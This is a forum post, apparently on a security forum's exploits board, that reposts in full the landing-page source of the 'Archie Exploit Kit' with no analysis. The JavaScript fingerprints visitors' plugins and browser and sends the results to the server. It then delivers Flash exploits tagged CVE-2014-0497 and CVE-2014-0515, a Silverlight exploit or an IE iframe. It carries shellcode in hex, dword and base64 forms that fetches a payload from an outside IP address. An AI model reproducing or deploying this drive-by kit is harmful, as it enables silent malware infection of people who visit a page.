Jump to content
Nytro

Archie Exploit Kit

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted 

    

    *** @PhysicalDrive0 ***

    2       <html>
    3       <head>
    4       <script type="text/javascript" src="pluginDet.js"></script>
    5       <style type="text/css">
    6       html, body { height: 100%; overflow: auto; }
    7       body { padding: 0; margin: 0; }
    8       #form1 { height: 99%; }
    9       #silverlightControlHost { text-align:center; }
    10      </style>
    11          <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    12      </head>
    13      <body>
    14      </body>
    15      <script>
    16      var payload = "FCE8A20000006089E531D2648B52308B520C8B52148B7228528B52108B423C8B44027885C0744801D0508B48188B582001D3E33A498B348B01D631FF31C0AC84C07407C1CF0D01C7EBF43B7D2475E3588B582401D3668B0C4B8B581C01D38B048B01D0894424205A61595A51FFE0585A8B12EBA16A40680010000068000400006A006854CAAF91FFD5C389C8C1E902F2A588C180E103F2A4C331C0505051535068361A2F70FFD5C35D686F6E00006875726C6D54688E4E0EECFFD5E8B4FFFFFF505068040100006833CA8A5BFFD5508B74240401C6B065880646B02E880646B064880646B06C880646B06C880646B000
    8806EB228B4C24088B1C2451E898FFFFFF688E4E0EECFFD568983A000068B0492DDBFFD5EB21E8D9FFFFFF687474703A2F2F3134342E37362E33362E36373A383038332F6464005858585858C3";
    17      var payload2 = "0x0018A164,0xC0830000,0x81208b08,0xFFF830C4,0xA2E8FCFF,0x60000000,0xD231E589,0x30528B64,0x8B0C528B,0x728B1452,0x528B5228,0x3C428B10,0x7802448B,0x4874C085,0x8B50D001,0x588B1848,0xE3D30120,0x348B493A,0x31D6018B,0xACC031FF,0x0774C084,0x010DCFC1,0x3BF4EBC7,0xE375247D,0x24588B58,0x8B66D301,0x588B4B0C,0x8BD3011C,0xD0018B04,0x20244489,0x5A59615A,0x58E0FF51,0xEB128B5A,0x68406AA1,0x00001000,0x00040068,0x68006A00,0x91AFCA54,0x89C3D5FF,0x02E9C1C8,0xC188A5F2,0xF203E180,0xC031C3A4,0x5351
    5050,0x1A366850,0xD5FF702F,0x6F685DC3,0x6800006E,0x6D6C7275,0x4E8E6854,0xD5FFEC0E,0xFFFFB4E8,0x685050FF,0x00000104,0x8ACA3368,0x50D5FF5B,0x0424748B,0x65B0C601,0xB0460688,0x4606882E,0x068864B0,0x886CB046,0x6CB04606,0xB0460688,0xEB068800,0x244C8B22,0x241C8B08,0xFF98E851,0x8E68FFFF,0xFFEC0E4E,0x3A9868D5,0xB0680000,0xFFDB2D49,0xE821EBD5,0xFFFFFFD9,0x70747468,0x312F2F3A,0x372E3434,0x36332E36,0x3A37362E,0x33383038,0x0064642F,0x58585858,0x9090C358";
    18      
    19      var payload3 = "/OiiAAAAYInlMdJki1Iwi1IMi1IUi3IoUotSEItCPItEAniFwHRIAdBQi0gYi1ggAdPjOkmLNIsB1jH/McCshMB0B8HPDQHH6/Q7fSR141iLWCQB02aLDEuLWBwB04sEiwHQiUQkIFphWVpR/+BYWosS66FqQGgAEAAAaAAEAABqAGhUyq+R/9XDicjB6QLypYjBgOED8qTDMcBQUFFTUGg2Gi9w/9XDXWhvbgAAaHVybG1UaI5ODuz/1ei0////UFBoBAEAAGgzyopb/9VQi3QkBAHGsGWIBkawLogGRrBkiAZGsGyIBkawbIgGRrAAiAbrIotMJAiLHCRR6Jj///9ojk4O7P/VaJg6AABosEkt2//V6yHo2f///2h0dHA6Ly8xNDQuNzYuMzYuNjc6ODA4My9kZABYWFhYWMOQkJA=";
    20      
    21      function spanAppend(val)
    22      {
    23          var a = document.createElement("span");
    24          document.body.appendChild(a);
    25          a.innerHTML = val;
    26      }
    27      
    28      function flashLow()
    29      {
    30          spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /><param name="movie" value="flashlow.swf" /><param name="allowScriptAccess" value="always" /><param name="FlashVars" value="id='+payload+'" /><param name="Play" valu
    e="true" /></object>');
    31      }
    32      
    33      function flashHigh()
    34      {
    35          spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="1" height="1" id="23kjsdf"><param name="movie" value="flashhigh.swf" /><param name="FlashVars" value="sh='+payload2+'" /></object>');
    36      }
    37      
    38      function silverHigh()
    39      {
    40          spanAppend('<form id="form1" runat="server" ><div id="silverlightControlHost"><object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%"><param name="source" value="silverapp1.xap"/><param name="background" value="white" /><param name="InitParams" value="payload='+p
    ayload3+'" /></object></div></form>');
    41      }
    42      
    43      function fV(val)
    44      {
    45          return PluginDetect.isMinVersion("Flash", val);
    46      }
    47      
    48      function sV(val)
    49      {
    50          return PluginDetect.isMinVersion("Silverlight", val);
    51      }
    52      
    53      function ie(turl)
    54      {
    55      w = "frameBorder";
    56      r = "width";
    57      q = "iframe";
    58      s = "height";
    59      z = "createElement";
    60      c = "src";
    61      g = '10';
    62      hh = turl;
    63      ha = document.createElement(q);
    64      ha[w] = '0';
    65      ha[r] = g;
    66      ha[s] = g;
    67      b = ha[c] = hh;
    68      document.body.appendChild(ha);
    69      return;
    70      }
    71      
    72      function ieVerOk()
    73      {
    74          t = "test";
    75      try {
    76      j = window.navigator.userAgent.toLowerCase();
    77      x = /MSIE[\/\s]\d+/i [t](j);
    78      m = /Win64;/i [t](j);
    79      z = /Trident\/(\d)/i [t](j) ? parseInt(RegExp.$1) : null;
    80      if (!m && x && z && (z == 6 || z == 5 || z == 4)) {
    81      return true
    82      }
    83      } catch (exc) {}
    84      return false
    85      }
    86      
    87      function ieVer() {
    88      t = "test";
    89      try {
    90          if (window.msCrypto)
    91              return 11;
    92          if (window.atob)
    93              return 10;
    94          if (document.addEventListener)
    95              return 9;
    96          if (window.JSON && document.querySelector)
    97              return 8;
    98          if (window.XMLHttpRequest)
    99              return 7;
    100     } catch (exc) { }
    101     return 0
    102     }
    103    
    104     function arch() {
    105     try
    106     {
    107     var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
    108     xmlDoc.async = false;
    109     xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://c:\\Program Files (x86)\\Internet Explorer\\iexplore.exe">');
    110     if (xmlDoc.parseError.errorCode == -2147023083)
    111     {
    112     return 64;
    113     }
    114     }
    115     catch (ex)
    116     {
    117     return 0;
    118     }
    119     return 32;
    120     }
    121    
    122     var flashVer = PluginDetect.getVersion("Flash");
    123     var Branch = 0;
    124     if (flashVer == "11,0,1,152"
    125     || flashVer == "11,1,102,55" || flashVer == "11,1,102,62"
    126     || flashVer == "11,1,102,63" || flashVer == "11,2,202,228"
    127     || flashVer == "11,2,202,233" || flashVer == "11,2,202,235")
    128         Branch = 1;
    129    
    130    
    131     if (fV("11,3,300,257") == 1 && (fV("11,7,700,276") == -0.1))
    132         Branch = 2;
    133     if (fV("11,8,800,94") == 1 && (fV("13,0,0,183") == -0.1))
    134         Branch = 2;
    135    
    136     var silverVer = PluginDetect.getVersion("Silverlight");
    137     var silverBranch = 0;
    138     if (sV("4,0,50401,0") == 1 && sV("5,1,10412,0") == -0.1)
    139         silverBranch = 1;
    140    
    141    
    142     var adoberVer = PluginDetect.getVersion("AdobeReader");
    143     var adoberBranch = 0;
    144    
    145     var archSys = arch();
    146     var ieVersion = 0;
    147     if (archSys != 0)
    148         ieVersion = ieVer();
    149    
    150     var sendstr = "";
    151     sendstr += encodeURI("dump=" + flashVer + "|" + silverVer + "|" + adoberVer + "|" + archSys + "|" + ieVersion + "|" + Branch);
    152     sendstr += encodeURI("&ua=" + window.navigator.userAgent);
    153     sendstr += encodeURI("&ref=" + document.referrer);
    154    
    155     if (Branch == 0 && silverBranch == 1)
    156     Branch = 3;
    157     if (Branch == 0 && archSys != 0)
    158         Branch = 4;
    159    
    160     try
    161     {
    162     var xmlhttp = new XMLHttpRequest();
    163     xmlhttp.open("POST", "/foo", false);
    164     xmlhttp.send(sendstr);
    165     }
    166     catch (exc){}
    167    
    168    
    169     switch (Branch)
    170     {
    171         //2014-0497
    172         case 1:
    173         flashLow();
    174         break;
    175        
    176         //2014-0515
    177         case 2:
    178         flashHigh();
    179         break;
    180        
    181         case 3:
    182         silverHigh();
    183         break;
    184        
    185         case 0:
    186         case 4:
    187         //var avar = archSys == 32 ? 0 : 1;
    188     //ie("/phazar.html?a="+avar);
    189    
    190         ie("/iebasic.html");
    191         break;
    192     }
    193    
    194    
    195     </script>
    196     </html>

Sursa: Archie Exploit Kit - Pastebin.com

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...